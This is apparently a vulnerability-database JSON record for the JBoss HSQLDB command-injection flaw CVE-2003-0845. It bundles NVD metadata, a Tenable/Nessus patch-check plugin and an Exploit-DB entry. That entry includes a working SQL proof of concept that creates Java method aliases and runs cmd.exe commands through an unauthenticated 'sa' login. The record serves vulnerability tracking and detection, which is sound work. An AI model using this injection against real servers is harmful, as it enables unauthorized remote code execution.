{"id": "CVE-2003-0845", "bulletinFamily": "NVD", "title": "CVE-2003-0845", "description": "Unknown vulnerability in the HSQLDB component in JBoss 3.2.1 and 3.0.8 on Java 1.4.x platforms, when running in the default configuration, allows remote attackers to conduct unauthorized activities and possibly execute arbitrary code via certain SQL statements to (1) TCP port 1701 in JBoss 3.2.1, and (2) port 1476 in JBoss 3.0.8.", "published": "2003-11-17T00:00:00", "modified": "2017-10-10T21:29:15", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0845", "reporter": "NVD", "references": ["http://marc.info/?l=bugtraq&m=106547728803252&w=2", "http://sourceforge.net/docman/display_doc.php?docid=19314&group_id=22866", "http://marc.info/?l=bugtraq&m=106546044416498&w=2", "http://www.redhat.com/support/errata/RHSA-2007-1048.html", "http://www.securityfocus.com/bid/8773"], "cvelist": ["CVE-2003-0845"], "type": "cve", "lastseen": "2017-10-11T11:05:50", "history": [{"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:11300", "name": "oval:org.mitre.oval:def:11300", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": [], "cvelist": ["CVE-2003-0845"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Unknown vulnerability in the HSQLDB component in JBoss 3.2.1 and 3.0.8 on Java 1.4.x platforms, when running in the default configuration, allows remote attackers to conduct unauthorized activities and possibly execute arbitrary code via certain SQL statements to (1) TCP port 1701 in JBoss 3.2.1, and (2) port 1476 in JBoss 3.0.8.", "edition": 1, "hash": "7c8db40a4fe7cbf2a522851f62f0115efe0a513893dd4090e6071144e0bb1048", "hashmap": [{"hash": "2f74ef87709ac6327d65a5997fa52f7a", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "d326052586e6532c48388f0cbf399ba8", "key": "description"}, {"hash": "aae7446cae05b9c802205f8010489196", "key": "href"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "95457f251420371e396d029e2ea0a193", "key": "cvelist"}, {"hash": "cd29023ac46db32a99410df27a064426", "key": "title"}, {"hash": "af2bff9b5b712fe689b9e0c8cfbd4acb", "key": "assessment"}, {"hash": "17257e7fdb107c6c79b196be141f82af", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "97a4e195afe5bd682d310edca10810ac", "key": "published"}, {"hash": "3c7f7f574d81b65970a0ba17e9ad2d18", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0845", "id": "CVE-2003-0845", "lastseen": "2016-09-03T04:04:59", "modified": "2010-08-21T00:16:48", "objectVersion": "1.2", "published": "2003-11-17T00:00:00", "references": ["http://marc.theaimsgroup.com/?l=bugtraq&m=106546044416498&w=2", "http://sourceforge.net/docman/display_doc.php?docid=19314&group_id=22866", "http://marc.theaimsgroup.com/?l=bugtraq&m=106547728803252&w=2", "http://www.redhat.com/support/errata/RHSA-2007-1048.html", "http://www.securityfocus.com/bid/8773"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11300", "name": "oval:org.mitre.oval:def:11300", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2003-0845", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T04:04:59"}, {"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:11300", "name": "oval:org.mitre.oval:def:11300", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": [], "cvelist": ["CVE-2003-0845"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Unknown vulnerability in the HSQLDB component in JBoss 3.2.1 and 3.0.8 on Java 1.4.x platforms, when running in the default configuration, allows remote attackers to conduct unauthorized activities and possibly execute arbitrary code via certain SQL statements to (1) TCP port 1701 in JBoss 3.2.1, and (2) port 1476 in JBoss 3.0.8.", "edition": 2, "enchantments": {}, "hash": "fdcec870b20733328f8557e2191f92155c11ba7a6ff8a922ad63712dc0ed4731", "hashmap": [{"hash": "2f74ef87709ac6327d65a5997fa52f7a", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "d326052586e6532c48388f0cbf399ba8", "key": "description"}, {"hash": "aae7446cae05b9c802205f8010489196", "key": "href"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "95457f251420371e396d029e2ea0a193", "key": "cvelist"}, {"hash": "cd29023ac46db32a99410df27a064426", "key": "title"}, {"hash": "af2bff9b5b712fe689b9e0c8cfbd4acb", "key": "assessment"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "60480c0b87a88565190aaad6de7e3065", "key": "modified"}, {"hash": "5af752151c910f06ff713f3f8a07fe06", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "97a4e195afe5bd682d310edca10810ac", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0845", "id": "CVE-2003-0845", "lastseen": "2017-04-18T15:50:04", "modified": "2016-10-17T22:37:56", "objectVersion": "1.2", "published": "2003-11-17T00:00:00", "references": ["http://marc.info/?l=bugtraq&m=106547728803252&w=2", "http://sourceforge.net/docman/display_doc.php?docid=19314&group_id=22866", "http://marc.info/?l=bugtraq&m=106546044416498&w=2", "http://www.redhat.com/support/errata/RHSA-2007-1048.html", "http://www.securityfocus.com/bid/8773"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11300", "name": "oval:org.mitre.oval:def:11300", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2003-0845", "type": "cve", "viewCount": 0}, "differentElements": ["assessment", "modified"], "edition": 2, "lastseen": "2017-04-18T15:50:04"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "50b2cfa1f281991b46876f030ab9733d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "95457f251420371e396d029e2ea0a193"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "d326052586e6532c48388f0cbf399ba8"}, {"key": "href", "hash": "aae7446cae05b9c802205f8010489196"}, {"key": "modified", "hash": "fa59077edbcfe43f65212fc7979716d1"}, {"key": "published", "hash": "97a4e195afe5bd682d310edca10810ac"}, {"key": "references", "hash": "5af752151c910f06ff713f3f8a07fe06"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "2f74ef87709ac6327d65a5997fa52f7a"}, {"key": "title", "hash": "cd29023ac46db32a99410df27a064426"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "a926d6c8bed92b58457ca8feef95ddb74635877a0cceb2c8466420d80d78315e", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-10-11T11:05:50"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:23221"]}, {"type": "centos", "idList": ["CESA-2007:1048"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2007-1048.NASL", "SL_20071205_OPENOFFICE_ORG__HSQLDB_ON_SL5_X.NASL", "CENTOS_RHSA-2007-1048.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:10094"]}, {"type": "redhat", "idList": ["RHSA-2007:1048"]}], "modified": "2017-10-11T11:05:50"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": [], "assessment": {"href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11300", "name": "oval:org.mitre.oval:def:11300", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11300", "name": "oval:org.mitre.oval:def:11300", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}]}

{"exploitdb": [{"lastseen": "2016-02-02T20:32:30", "bulletinFamily": "exploit", "description": "JBoss 3.0.8/3.2.1 HSQLDB Remote Command Injection Vulnerability. CVE-2003-0845. Remote exploits for multiple platform", "modified": "2003-10-06T00:00:00", "published": "2003-10-06T00:00:00", "id": "EDB-ID:23221", "href": "https://www.exploit-db.com/exploits/23221/", "type": "exploitdb", "title": "JBoss 3.0.8/3.2.1 HSQLDB Remote Command Injection Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/8773/info\r\n\r\nA remote command-injection vulnerability has been reported in JBoss. The issue is reportedly exposed via the HSQLDB component, which is a SQL database server that manages JMS connections. Because of a number of flaws, an attacker can pass commands to the HSQLDB component via the port it listens on. Note that the port may vary between versions; by default it is 1701/TCP for JBoss 3.2.1 and 1476/TCP for 3.0.8.\r\n\r\nAttackers can exploit this issue to mount a number of attacks, including execution of database commands, denial-of-service attacks, log manipulation, information disclosure, and execution of operating system commands on some supported platforms.\r\n\r\nThis issue is reported to exist with JBoss 3.2.1/3.0.8 on any Java 1.4.x-enabled platforms. Other versions may also be affected. \r\n\r\n<target name=\"cmdinject\">\r\n<sql\r\nclasspath=\"hsqldb.jar\"\r\ndriver=\"org.hsqldb.jdbcDriver\"\r\nurl=\"jdbc:hsqldb:hsql://${host}:${port}\"\r\nuserid=\"sa\"\r\npassword=\"\"\r\nprint = \"true\"\r\n>\r\nCREATE ALIAS COMPDEBUG FOR\r\n\"org.apache.xml.utils.synthetic.JavaUtils.setDebug\"\r\nCREATE ALIAS SETPROP FOR \"java.lang.System.setProperty\";\r\nCREATE ALIAS COMPILE FOR\r\n\"org.apache.xml.utils.synthetic.JavaUtils.JDKcompile\";\r\n\r\nCALL COMPDEBUG(true);\r\nCALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe');\r\nCALL COMPILE('/c REGEDIT.EXE','');\r\n</sql>\r\n</target> ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23221/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:05", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://sourceforge.net/docman/display_doc.php?docid=19314&group_id=22866)\n[Secunia Advisory ID:27914](https://secuniaresearch.flexerasoftware.com/advisories/27914/)\nRedHat RHSA: RHSA-2007:1048\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-10/0074.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-10/0087.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-07/0044.html\nISS X-Force ID: 13357\n[CVE-2003-0845](https://vulners.com/cve/CVE-2003-0845)\n[CVE-2005-2158](https://vulners.com/cve/CVE-2005-2158)\nBugtraq ID: 8773\n", "modified": "2003-10-05T00:00:00", "published": "2003-10-05T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:10094", "id": "OSVDB:10094", "type": "osvdb", "title": "JBoss HSQLDB Component TCP Port SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:12:52", "bulletinFamily": "scanner", "description": "Updated openoffice.org and hsqldb packages that fix security flaws are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nOpenOffice.org is an office productivity suite. HSQLDB is a Java relational database engine used by OpenOffice.org Base.\n\nIt was discovered that HSQLDB could allow the execution of arbitrary public static Java methods. A carefully crafted odb file opened in OpenOffice.org Base could execute arbitrary commands with the permissions of the user running OpenOffice.org. (CVE-2007-4575)\n\nIt was discovered that HSQLDB did not have a password set on the 'sa' user. If HSQLDB has been configured as a service, a remote attacker who could connect to the HSQLDB port (tcp 9001) could execute arbitrary SQL commands. (CVE-2003-0845)\n\nNote that in Red Hat Enterprise Linux 5, HSQLDB is not enabled as a service by default, and needs manual configuration in order to work as a service.\n\nUsers of OpenOffice.org or HSQLDB should update to these errata packages which contain backported patches to correct these issues.", "modified": "2018-12-20T00:00:00", "id": "CENTOS_RHSA-2007-1048.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43661", "published": "2010-01-06T00:00:00", "title": "CentOS 5 : openoffice.org / hsqldb (CESA-2007:1048)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:1048 and \n# CentOS Errata and Security Advisory 2007:1048 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43661);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/12/20 11:08:44\");\n\n script_cve_id(\"CVE-2003-0845\", \"CVE-2007-4575\");\n script_bugtraq_id(26703);\n script_xref(name:\"RHSA\", value:\"2007:1048\");\n\n script_name(english:\"CentOS 5 : openoffice.org / hsqldb (CESA-2007:1048)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openoffice.org and hsqldb packages that fix security flaws are\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nOpenOffice.org is an office productivity suite. HSQLDB is a Java\nrelational database engine used by OpenOffice.org Base.\n\nIt was discovered that HSQLDB could allow the execution of arbitrary\npublic static Java methods. A carefully crafted odb file opened in\nOpenOffice.org Base could execute arbitrary commands with the\npermissions of the user running OpenOffice.org. (CVE-2007-4575)\n\nIt was discovered that HSQLDB did not have a password set on the 'sa'\nuser. If HSQLDB has been configured as a service, a remote attacker\nwho could connect to the HSQLDB port (tcp 9001) could execute\narbitrary SQL commands. (CVE-2003-0845)\n\nNote that in Red Hat Enterprise Linux 5, HSQLDB is not enabled as a\nservice by default, and needs manual configuration in order to work as\na service.\n\nUsers of OpenOffice.org or HSQLDB should update to these errata\npackages which contain backported patches to correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-January/014624.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd7001d8\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-January/014625.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec8e6774\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected hsqldb and / or openoffice.org packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:hsqldb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:hsqldb-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:hsqldb-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:hsqldb-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-calc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-draw\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-emailmerge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-graphicfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-impress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-javafilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-af_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-as_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-bg_BG\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-bn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ca_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-cs_CZ\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-cy_GB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-da_DK\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-el_GR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-et_EE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-eu_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-fi_FI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ga_IE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-gl_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-gu_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-he_IL\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-hi_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-hr_HR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-hu_HU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ja_JP\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-kn_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ko_KR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-lt_LT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ml_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-mr_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ms_MY\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-nb_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-nn_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-nr_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-nso_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-or_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-pa_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-pl_PL\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-pt_PT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-sk_SK\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-sl_SI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-sr_CS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ss_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-st_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-sv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ta_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-te_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-th_TH\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-tn_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-tr_TR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ts_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ur\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-ve_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-xh_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-langpack-zu_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-math\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-pyuno\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-testtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-writer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openoffice.org-xsltfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"hsqldb-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"hsqldb-demo-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"hsqldb-javadoc-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"hsqldb-manual-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-base-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-calc-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-core-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-draw-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-emailmerge-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-graphicfilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-impress-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-javafilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-af_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ar-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-as_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-bg_BG-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-bn-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ca_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-cs_CZ-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-cy_GB-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-da_DK-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-de-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-el_GR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-es-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-et_EE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-eu_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-fi_FI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-fr-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ga_IE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-gl_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-gu_IN-2.0.4-5.4.25\")) 